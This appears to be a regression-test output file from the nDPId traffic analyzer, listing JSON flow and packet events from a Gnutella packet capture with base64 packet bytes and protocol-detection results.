+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":74108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0\/F1AAIAGA80KAAIPJOnJocRQC0aEhFh7AAAAAIAC+vDM7wAAAgQFtAEDAwgBAQQC"} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":74217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74217,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Dd5AAIAGwQMKAAIPQh7dtcRHyWh8xjFMAAAAAIAC+vAMegAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IwxAAIAGfuEKAAIPUAf8wMRGsnV8RDFlAAAAAIAC+vD24gAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0c0NAAIAGin0KAAIPvD00t8RE+erRmdziAAAAAIAC+vAKcAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0I3RAAIAGoE0KAAIPST7htcRFtvuqIJp6AAAAAIAC+vB9QAAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74327,"flow_last_seen":74327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74327,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":74327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74327,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04otAAIAG+gUKAAIPt7NacMRTJnw0vRokAAAAAIAC+vAcPAAAAgQFtAEDAwgBAQQC"} +00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74328,"flow_last_seen":74328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74328,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":74328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74328,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdJAAIAG7kEKAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74328,"flow_last_seen":74328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74328,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":74328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74328,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZARAAIAGxHUKAAIPnDkqAsRVgsQy7nYLAAAAAIAC+vCxwQAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74329,"flow_last_seen":74329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74329,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":74329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07XNAAIAG0w0KAAIPUD3d9sRWd3H5FzmMAAAAAIAC+vDLcAAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":74362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74362,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuYAAEAGPaRQPd32CgACD3dxxFYAg9YB+Rc5jWAS\/\/8Y4gAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":74362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74362,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo7XRAAIAG0xgKAAIPUD3d9sRWd3H5FzmNAIPWAlAQ+vA1rgAA"} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74329,"flow_last_seen":74362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":74362,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":74510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74510,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuwAAEAGWa63s1pwCgACDyZ8xFMAhNABNL0aJWAS\/\/9vrAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":74510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74510,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo4oxAAIAG+hAKAAIPt7NacMRTJnw0vRolAITQAlAQ+vCMeAAA"} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74327,"flow_last_seen":74511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":74511,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdtAAIAGUVoKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTlAAIAG3SgKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} 
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8RAAIAGrlIKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EVBAAIAGi58KAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Co5AAIAGJkYKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":75108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gZBAAIAGBp8KAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":75264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75264,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnNAAIAGzTcKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":75280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75280,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvhAAIAGYVMKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75358,"flow_last_seen":75358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75358,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":75358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75358,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOZAAIAGV+4KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} 
+00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75358,"flow_last_seen":75358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75358,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":75358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75358,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYdAAIAGqOAKAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75359,"flow_last_seen":75359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75359,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsVAAIAGE9AKAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75359,"flow_last_seen":75359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75359,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLlAAIAGV04KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":75482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":75482,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAvIAAEAGpZCcOSoCCgACD4LExFUAh74BMu52DGAS\/\/8XLwAAAgQFtA=="} 
+00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":75482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75482,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZAVAAIAGxIAKAAIPnDkqAsRVgsQy7nYMAIe+AlAQ+vAz+wAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74328,"flow_last_seen":75501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":75501,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":75731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75731,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAvQAAP8GIh\/bRq9nCgACDxDbxFoAAAAAE+XzBlAUAAA88gAA"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtJAAIAGDgUKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R05AAIAGN+MKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faNAAIAGiKQKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zhAAIAGNBcKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":76233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76233,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLpAAIAGV00KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+G1AAIAG6ukKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00EJAAIAGLmEKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYdAAIAGFfcKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0K4pAAIAGtdYKAAIPb\/adXsQzx+daqkeOAAAAAIAC+vAsaAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vG5AAIAGN8cKAAIPAST5W8Q1\/ZgxDGGiAAAAAIAC+vAZFAAAAgQFtAEDAwgBAQQC"} 